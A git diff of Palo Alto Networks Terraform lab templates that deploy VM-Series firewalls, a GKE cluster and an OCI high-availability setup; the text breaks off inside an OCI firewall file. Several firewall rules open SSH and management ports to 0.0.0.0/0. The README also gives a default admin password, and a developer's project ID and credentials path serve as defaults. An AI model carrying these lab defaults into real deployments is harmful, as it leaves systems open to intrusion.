b/gcp/ilbnh-mig/servers.tf @@ -0,0 +1,29 @@ +#----------------------------------------------------------------------------------------------- +# Create N webservers in one subnet. N is determined by the number of hostnames in the list +module "server1" { + source = "./modules/vm/" + names = var.server1_vms + zones = [data.google_compute_zones.available.names[0]] + subnetworks = [module.vpc0.subnetwork_self_link] + server_ips = var.server1_ips + server_public_ip = var.server_public_ip + machine_type = var.server_size + image = var.server_image + ssh_key = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : "" + startup_script = file("${path.module}/scripts/webserver-startup.sh") +} + +#----------------------------------------------------------------------------------------------- +# Create X webservers in another subnet. X is determined by the number of hostnames in the list +module "server2" { + source = "./modules/vm/" + names = var.server2_vms + zones = [data.google_compute_zones.available.names[0]] + subnetworks = [module.vpc2.subnetwork_self_link] + server_ips = var.server2_ips + server_public_ip = var.server_public_ip + machine_type = var.server_size + image = var.server_image + ssh_key = fileexists(var.public_key_path) ? 
"${var.server_user}:${file(var.public_key_path)}" : "" + startup_script = file("${path.module}/scripts/webserver-startup.sh") +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/terraform.tfvars b/gcp/ilbnh-mig/terraform.tfvars new file mode 100644 index 00000000..31dd7687 --- /dev/null +++ b/gcp/ilbnh-mig/terraform.tfvars @@ -0,0 +1,48 @@ +project_id = "" +auth_file = "" +public_key_path = "" # Your SSH Key + +#fw_panos = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL +fw_panos = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1 +#fw_panos = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2 + + +#------------------------------------------------------------------- +region = "us-central1" + +vpc0 = "testing" +vpc0_subnet = "testing-subnet" +vpc0_cidr = "10.30.1.0/24" + +vpc1 = "mgmt" +vpc1_subnet = "mgmt-subnet" +vpc1_cidr = "10.60.1.0/24" + +vpc2 = "production" +vpc2_subnet = "production-subnet" +vpc2_cidr = "10.50.1.0/24" + +vpc3 = "production2" +vpc3_subnet = "production2-subnet" +vpc3_cidr = "10.40.1.0/24" + +fw_base_name = "vmseries" +fw_machine_type = "n1-standard-4" +target_size = "1" + +mgmt_sources = ["0.0.0.0/0"] +health_check_port = "22" +all_ports = true + +server_user = "demo" +server_size = "f1-micro" +server_image = "ubuntu-os-cloud/ubuntu-1604-lts" +server_public_ip = true +server1_vms = ["testing-vm"] +server1_ips = ["10.30.1.100"] + +server2_vms = ["production-vm"] +server2_ips = ["10.50.1.100"] + +ilb1_ip = "10.30.1.99" +ilb2_ip = "10.50.1.99" diff --git a/gcp/ilbnh-mig/variables.tf b/gcp/ilbnh-mig/variables.tf new file mode 100644 index 00000000..98a46495 --- /dev/null +++ b/gcp/ilbnh-mig/variables.tf @@ -0,0 +1,122 @@ +variable project_id { + description = "GCP Project ID" +} + +variable auth_file { + description = "GCP Project auth file" + default = "" +} + +variable region { +} + +variable fw_panos { + description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)" +} + +variable fw_image { + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries" +} + +variable fw_base_name { +} + +variable target_size { +} + +variable fw_machine_type { +} + +variable mgmt_sources { + type = list(string) +} + +variable health_check_port { + description = "Port the ILB will health check" + default = "22" +} + +variable all_ports { + description = "Enable all ports on the ILB" + default = true +} +variable vpc1 { +} + +variable vpc1_subnet { +} + +variable vpc1_cidr { +} + +variable vpc0 { +} + +variable vpc0_subnet { +} + +variable vpc0_cidr { +} + +variable vpc2 { +} + +variable vpc2_subnet { +} + +variable vpc2_cidr { +} + +variable vpc3 { +} + +variable vpc3_subnet { +} + +variable vpc3_cidr { +} + +variable server1_vms { + type = list(string) +} + +variable server1_ips { + type = list(string) +} + +variable server2_vms { + type = list(string) +} + +variable server_user { + description = "SSH user for Linux VM" +} + +variable server2_ips { + type = list(string) +} + +variable server_size { + description = "Machine size for the server VMs" +} + +variable server_image { + description = "OS image for server installation" +} + +variable server_public_ip { + description = "Should we assign a public IP to the server" + default = false +} + +variable public_key_path { + description = "Local path to public SSH key. 
If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin" +} + +variable ilb1_ip { + description = "IP address for ILB1" +} + +variable ilb2_ip { + description = "IP address for ILB2" +} diff --git a/gcp/k8s-Prisma-API/.gitignore b/gcp/k8s-Prisma-API/.gitignore new file mode 100644 index 00000000..8d51dd09 --- /dev/null +++ b/gcp/k8s-Prisma-API/.gitignore @@ -0,0 +1,2 @@ +# pycharm +.DS_Store diff --git a/gcp/k8s-Prisma-API/.meta-cnc.yaml b/gcp/k8s-Prisma-API/.meta-cnc.yaml new file mode 100644 index 00000000..e651d353 --- /dev/null +++ b/gcp/k8s-Prisma-API/.meta-cnc.yaml @@ -0,0 +1,43 @@ +name: gke_k8s_EW_inspection + +# label should be a human readable label that conveys what this skillet will do +label: GCP 4-node k8s cluster with VM-Series Firewall + +description: This skillet deploys a 4-node GCP k8s cluster with a VM-Series Firewall for both N/S and E/W Inspection. This is the base deployment used in the Ignite 19 k8s HOW lab. There is also a guide that walks through deploying a 2 tier container application and Prisma Public Cloud API scanning. + +# type instructs Panhandler how to consume this skillet +type: terraform + +# extends allows you to include other skillets along with this one +extends: + +# labels allow extensible configuration options per skillet type. For example, lables can be used to +# group multiple skillets of the same type (pan-os skillets labeled as version: 9.0 for example) +labels: + collection: GCP K8s Prisma API + + +# Variables will be presented to the user via the Panhandler GUI. These values will then be passed to +# the terraform binary as '--var' options, thus overriding any tfvars entries. +# Variable names MUST match the names of the defined terraform variables +variables: + - name: container-ver + description: GCP Container Ver + default: 1.11.10-gke.4 + type_hint: gcloud container get-server-config --zone us-central1 + - name: my_gcp_project + description: GCP Project + default: djs-gcp-2018 + type_hint: project id + - name: region + description: GCP Region + default: us-central1 + type_hint: text + - name: zone + description: GCP Zone + default: us-central1-a + type_hint: text + - name: credentials_file_path + description: Path to the JSON file used to describe your account credentials + default: djs-gcp-2018-creds.json + type_hint: text diff --git a/gcp/k8s-Prisma-API/LICENSE b/gcp/k8s-Prisma-API/LICENSE new file mode 100644 index 00000000..261eeb9e --- /dev/null +++ b/gcp/k8s-Prisma-API/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. 
+ + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. 
If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. 
Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. 
diff --git a/gcp/k8s-Prisma-API/Main.tf b/gcp/k8s-Prisma-API/Main.tf new file mode 100644 index 00000000..92932bc5 --- /dev/null +++ b/gcp/k8s-Prisma-API/Main.tf @@ -0,0 +1,358 @@ +provider "google" { + credentials = "${file(var.credentials_file_path)}" + project = "${var.my_gcp_project}" + region = "${var.region}" +} + +// Adding SSH Public Key Project Wide +resource "google_compute_project_metadata_item" "ssh-keys" { + key = "ssh-keys" + value = "${var.gce_ssh_user}:${var.gce_ssh_pub_key}" +} + +// Adding VPC Networks to Project MANAGEMENT +resource "google_compute_subnetwork" "management-sub" { + name = "management-sub" + ip_cidr_range = "10.5.0.0/24" + network = "${google_compute_network.management.self_link}" + region = "${var.region}" +} + +resource "google_compute_network" "management" { + name = "${var.interface_0_name}" + auto_create_subnetworks = "false" +} + +// Adding VPC Networks to Project UNTRUST +resource "google_compute_subnetwork" "untrust-sub" { + name = "untrust-sub" + ip_cidr_range = "10.5.1.0/24" + network = "${google_compute_network.untrust.self_link}" + region = "${var.region}" +} + +resource "google_compute_network" "untrust" { + name = "${var.interface_1_name}" + auto_create_subnetworks = "false" +} + +// Adding VPC Networks to Project TRUST +resource "google_compute_subnetwork" "trust-sub" { + name = "trust-sub" + ip_cidr_range = "10.5.2.0/24" + network = "${google_compute_network.trust.self_link}" + region = "${var.region}" +} + +resource "google_compute_network" "trust" { + name = "${var.interface_2_name}" + auto_create_subnetworks = "false" +} + +// Adding GCP Outbound Route to TRUST Interface +resource "google_compute_route" "trust" { + name = "trust-route" + dest_range = "0.0.0.0/0" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 100 + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + "google_compute_instance.firewall", + "google_container_node_pool.db_nodes", + ] +} + +// Adding GCP Route to Cluster MGMT Endpoint +resource "google_compute_route" "k8mgmt" { + name = "cluster-endpoint-route" + dest_range = "${element(google_container_cluster.cluster.*.endpoint,count.index)}/32" + network = "${google_compute_network.trust.self_link}" + next_hop_gateway = "default-internet-gateway" + priority = 100 + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + "google_compute_instance.firewall", + "google_container_node_pool.db_nodes", + ] +} + +// Adding GCP Firewall Rules for MANGEMENT +resource "google_compute_firewall" "allow-mgmt" { + name = "allow-mgmt" + network = "${google_compute_network.management.self_link}" + + allow { + protocol = "icmp" + } + + allow { + protocol = "tcp" + ports = ["443", "22"] + } + + source_ranges = ["0.0.0.0/0"] +} + +// Adding GCP Firewall Rules for INBOUND +resource "google_compute_firewall" "allow-inbound" { + name = "allow-inbound" + network = "${google_compute_network.untrust.self_link}" + + allow { + protocol = "tcp" + ports = ["80", "22", "8888"] + } + + source_ranges = ["0.0.0.0/0"] +} + +// Adding GCP Firewall Rules for OUTBOUND +resource "google_compute_firewall" "allow-outbound" { + 
name = "allow-outbound" + network = "${google_compute_network.trust.self_link}" + + allow { + protocol = "all" + + # ports = ["all"] + } + + source_ranges = ["0.0.0.0/0"] +} + +// Create a new Palo Alto Networks NGFW VM-Series GCE instance +resource "google_compute_instance" "firewall" { + name = "${var.firewall_name}-${count.index + 1}" + machine_type = "${var.machine_type_fw}" + zone = "${var.zone}" + can_ip_forward = true + allow_stopping_for_update = true + count = 1 + + // Adding METADATA Key Value pairs to VM-Series GCE instance + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket_fw}" + serial-port-enable = true + + #sshKeys = "${var.public_key}" + } + + service_account { + scopes = "${var.scopes_fw}" + } + + network_interface { + subnetwork = "${google_compute_subnetwork.management-sub.self_link}" + network_ip = "10.5.0.4" + + //address = "10.5.0.4" + access_config = {} + } + + network_interface { + subnetwork = "${google_compute_subnetwork.untrust-sub.self_link}" + + network_ip = "10.5.1.4" + access_config = {} + } + + network_interface { + subnetwork = "${google_compute_subnetwork.trust-sub.self_link}" + + network_ip = "10.5.2.100" + } + + boot_disk { + initialize_params { + image = "${var.image_fw}" + } + } + + depends_on = [ + "google_compute_network.trust", + "google_compute_subnetwork.trust-sub", + ] +} + +//Create a K8s cluster +resource "google_container_cluster" "cluster" { + name = "cluster-1" + zone = "${var.zone}" + min_master_version = "${var.container-ver}" + initial_node_count = 2 + enable_kubernetes_alpha = true + cluster_ipv4_cidr = "10.16.0.0/14" + logging_service = "none" + monitoring_service = "none" + network = "${google_compute_network.trust.self_link}" + subnetwork = "${google_compute_subnetwork.trust-sub.self_link}" + + maintenance_policy { + daily_maintenance_window { + start_time = "03:00" + } + } + + addons_config { + http_load_balancing { + disabled = false + } + + horizontal_pod_autoscaling { + disabled = false + } + } + + node_config { + disk_size_gb = "32" + image_type = "COS" + machine_type = "n1-standard-1" + preemptible = false + oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"] + + labels { + pool = "web-pool" + cluster = "the-cluster" + } + + tags = ["the-cluster", "gke-node", "web-tier"] + } + + lifecycle { + create_before_destroy = true + } + + depends_on = [ + "google_compute_network.trust", + "google_compute_subnetwork.trust-sub", + "google_compute_instance.firewall", + ] +} + +resource "google_container_node_pool" "db_nodes" { + name = "db-node-pool" + region = "${var.zone}" + cluster = "${google_container_cluster.cluster.name}" + node_count = 2 + + node_config { + disk_size_gb = "32" + image_type = "COS" + machine_type = "n1-standard-1" + preemptible = false + oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"] + + labels { + pool = "db-pool" + cluster = "the-cluster" + } + + tags = ["the-cluster", "gke-node", "db-tier"] + } + + lifecycle { + create_before_destroy = true + 
} + + depends_on = [ + "google_compute_network.trust", + "google_compute_subnetwork.trust-sub", + "google_compute_instance.firewall", + "google_container_cluster.cluster", + ] +} + +// Adding GCP Route to Node instances +resource "google_compute_route" "gke-node0" { + name = "gke-node0" + dest_range = "10.16.0.0/24" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 10 + tags = ["db-tier"] + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + ] +} + +resource "google_compute_route" "gke-node1" { + name = "gke-node1" + dest_range = "10.16.1.0/24" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 10 + tags = ["db-tier"] + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + ] +} + +resource "google_compute_route" "gke-node2" { + name = "gke-node2" + dest_range = "10.16.2.0/24" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 10 + tags = ["web-tier"] + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + ] +} + +resource "google_compute_route" "gke-node3" { + name = "gke-node3" + dest_range = "10.16.3.0/24" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 10 + tags = ["web-tier"] + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + ] +} + +output "pan-tf-name" { + value = "${google_compute_instance.firewall.*.name}" +} + +output "k8s-cluster-name" { + value = "${google_container_cluster.cluster.*.name}" +} + +output "k8s-cluster-endpoint" { + value = "${google_container_cluster.cluster.*.endpoint}" +} + +output "k8s-cluster_ipv4_cidr" { + value = "${google_container_cluster.cluster.*.cluster_ipv4_cidr}" +} diff --git a/gcp/k8s-Prisma-API/README.md b/gcp/k8s-Prisma-API/README.md new file mode 100644 index 00000000..ccfbe6c9 --- /dev/null +++ b/gcp/k8s-Prisma-API/README.md @@ -0,0 +1,2 @@ +# k8s-terraform-skillet +This Repository Holds the Terraform template in a PANW Skillet format to deploy a GKE K8s cluster that supports E/W inspection. 
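As a companion to the skillet metadata above (which notes that Panhandler passes each variable to the terraform binary as a `--var` override), the same values can be supplied in a terraform.tfvars when the template is run directly with `terraform apply`. This is only a sketch: the version, region, and zone values mirror the skillet defaults shown above, while the project ID and credentials path are placeholders you must replace with your own.

```
# Hypothetical terraform.tfvars for running this template outside Panhandler.
# Variable names match Variables.tf / .meta-cnc.yaml; project and credentials
# values below are placeholders.
container-ver         = "1.11.10-gke.4"
my_gcp_project        = "my-gcp-project"       # your GCP project ID (placeholder)
region                = "us-central1"
zone                  = "us-central1-a"
credentials_file_path = "my-gcp-creds.json"    # path to a service-account JSON key (placeholder)
```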
diff --git a/gcp/k8s-Prisma-API/Variables.tf b/gcp/k8s-Prisma-API/Variables.tf new file mode 100644 index 00000000..fdb1944c --- /dev/null +++ b/gcp/k8s-Prisma-API/Variables.tf @@ -0,0 +1,72 @@ +// PROJECT Variables +variable "container-ver" { + default = "1.11.8-gke.6" +} + +variable "my_gcp_project" { + default = "djs-gcp-2018" +} + +variable "region" { + default = "us-central1" +} + +variable "zone" { + default = "us-central1-a" +} + +variable "credentials_file_path" { + description = "Path to the JSON file used to describe your account credentials" + default = "/Users/dspears/GCP/k8-test/djs-gcp-2018-creds.json" +} + +variable "gce_ssh_user" { + description = "SSH user that is used in the public key" + default = "dspears@SJCMAC3024G8WL" +} + +variable "gce_ssh_pub_key" { + description = "SSH public key in the format: ssh-rsa username" + default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bjwWN/LY87FOZH/uuRXS5ku3OXkxsFIvecXMNDoeTNZU5QSM3bAV8t/IU52GsdQO+f2hv9iVulMfYPwxsMcVen32q+t6dcgtChUXPSk+giGqf71iR2xiqGdk6GgC705SUXG/AX1whNI1qT84wP0nOrJaoGo/SZq4Ryel9mptu1Ifj1vMphyw2WOFOMB3IuUYckZHgwbQxZK4iCGJSZmzP+M03oSKZATwvuI1XXUIUVTCcV45NofgCW3Ocfk0UjhK01l1SO3H4+c+v40Zufpqo4vPMOQajTggygpJ7SRCgOYWJxcdx4cr9ASNteii5LQFqAixJD0+0izXfQEUm0/T dspears@SJCMAC3024G8WL" +} + +//The rest of the variables do not need to be modified for the K8s Lab +// VM-Series Firewall Variables + +variable "firewall_name" { + default = "firewall" +} + +variable "image_fw" { + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-810" + + //default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810" +} + +variable "machine_type_fw" { + default = "n1-standard-4" +} + +variable "bootstrap_bucket_fw" { + default = "k8-ew" +} + +variable "interface_0_name" { + default = "management" +} + +variable "interface_1_name" { + default = "untrust" +} + +variable "interface_2_name" { + default = "trust" +} + +variable "scopes_fw" { + default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} diff --git a/oci/HA/OCI HA deployment guide.pdf b/oci/HA/OCI HA deployment guide.pdf new file mode 100644 index 00000000..d41da875 Binary files /dev/null and b/oci/HA/OCI HA deployment guide.pdf differ diff --git a/oci/HA/OCI-HA.png b/oci/HA/OCI-HA.png new file mode 100644 index 00000000..128459fc Binary files /dev/null and b/oci/HA/OCI-HA.png differ diff --git a/oci/HA/README.md b/oci/HA/README.md new file mode 100644 index 00000000..3928a15c --- /dev/null +++ b/oci/HA/README.md @@ -0,0 +1,32 @@ +# Sample HA deployment for OCI + +Terraform creates: +- A single compartment to house all infrastructure +- A VCN with 5 regional subnets (management, untrust, trust, ha2, web) +- 2 VM-Series firewalls in separate Availability Domains (ADs) +- A test server +- OCI Dynamic Groups and Policies for secondary IP address management + +HA in OCI works by moving the secondary IP addresses from the failed firewall to the newly active one. This is accomplished by the VM-Series plugin, available in OCI beginning with PAN-OS 9.1.1. +
+
+
+ +Prior to deployment, update terraform.tfvars with the following information (an illustrative terraform.tfvars sketch follows this README): +- tenancy_ocid - The OCID of the target tenancy +- user_ocid - The OCID of the user deploying the infrastructure +- fingerprint - The fingerprint associated with the user's API key +- private_key_path - The absolute path to the user's PEM-formatted API signing private key +- parent_compartment_ocid - The OCID of the parent/root compartment +- ssh_authorized_key - The public SSH key for the user (format = "ssh-rsa ") +- fw_mgmt_src_ip - The IP or subnet authorized to connect to the FW post-deployment + +By default, the deployment is into us-ashburn-1. This may be altered by changing the relevant variables in terraform.tfvars. + +The folder fw-configs contains sample configuration files for the FW. These configuration files have HA pre-configured, allow SSH access to the server, and permit all outbound access to the internet. The username is 'admin' and the password is 'Pal0Alt0@123', which should be changed immediately. + +## Support Policy +These files are released under an as-is, best-effort support policy. These scripts should be seen as community supported, and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used by the scripts or templates (the VM-Series firewall) is still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
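Returning to the variable list above, a minimal terraform.tfvars sketch is shown below for orientation. Every OCID, fingerprint, path, key, and IP in it is a placeholder (illustrative only) and must be replaced with values from the target tenancy; the region line is only needed when deploying somewhere other than the us-ashburn-1 default.

```hcl
# Illustrative placeholders only -- substitute real tenancy values before running Terraform.
tenancy_ocid            = "ocid1.tenancy.oc1..exampleuniqueid"
user_ocid               = "ocid1.user.oc1..exampleuniqueid"
fingerprint             = "12:34:56:78:9a:bc:de:f0:12:34:56:78:9a:bc:de:f0"
private_key_path        = "/home/operator/.oci/oci_api_key.pem"
parent_compartment_ocid = "ocid1.compartment.oc1..exampleuniqueid"
region                  = "us-ashburn-1"
ssh_authorized_key      = "ssh-rsa AAAAB3Nza...examplekey operator@example-host"
fw_mgmt_src_ip          = "203.0.113.10/32"
```

Any other variable defined by the template can be overridden in this file in the same way.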
diff --git a/oci/HA/compartment.tf b/oci/HA/compartment.tf new file mode 100644 index 00000000..0b053323 --- /dev/null +++ b/oci/HA/compartment.tf @@ -0,0 +1,6 @@ +resource "oci_identity_compartment" "compartment" { + compartment_id = "${var.parent_compartment_ocid}" + name = "${var.compartment_name}" + description = "compartment created by terraform" + enable_delete = true +} \ No newline at end of file diff --git a/oci/HA/firewalls.tf b/oci/HA/firewalls.tf new file mode 100644 index 00000000..2496016e --- /dev/null +++ b/oci/HA/firewalls.tf @@ -0,0 +1,60 @@ +resource "oci_core_instance" "firewall1" { + availability_domain = "${var.fw1_availability_domain}" + compartment_id = "${oci_identity_compartment.compartment.id}" + display_name = "FW-A" + shape = "${var.fw_shape_size}" + + create_vnic_details { + subnet_id = "${oci_core_subnet.management.id}" + private_ip = "${var.fw1_management_ip}" + display_name = "management" + assign_public_ip = true + skip_source_dest_check = false + #nsg_ids = ["${oci_core_network_security_group.management.id}"] + } + + source_details { + source_type = "image" + source_id = "${var.fw_ocid}" + boot_volume_size_in_gbs = "60" + } + preserve_boot_volume = false + + metadata = { + ssh_authorized_keys = "${var.ssh_authorized_key}" +# user_data = "${base64encode(file("./userdata/bootstrap"))}" + } + timeouts { + create = "60m" + } +} +resource "oci_core_instance" "firewall2" { + availability_domain = "${var.fw2_availability_domain}" + compartment_id = "${oci_identity_compartment.compartment.id}" + display_name = "FW-B" + shape = "${var.fw_shape_size}" + + create_vnic_details { + subnet_id = "${oci_core_subnet.management.id}" + private_ip = "${var.fw2_management_ip}" + display_name = "management" + assign_public_ip = true + skip_source_dest_check = false + #nsg_ids = ["${oci_core_network_security_group.management.id}"] + } + + source_details { + source_type = "image" + source_id = "${var.fw_ocid}" + boot_volume_size_in_gbs = "60" + } + preserve_boot_volume = false + + metadata = { + ssh_authorized_keys = "${var.ssh_authorized_key}" +# user_data = 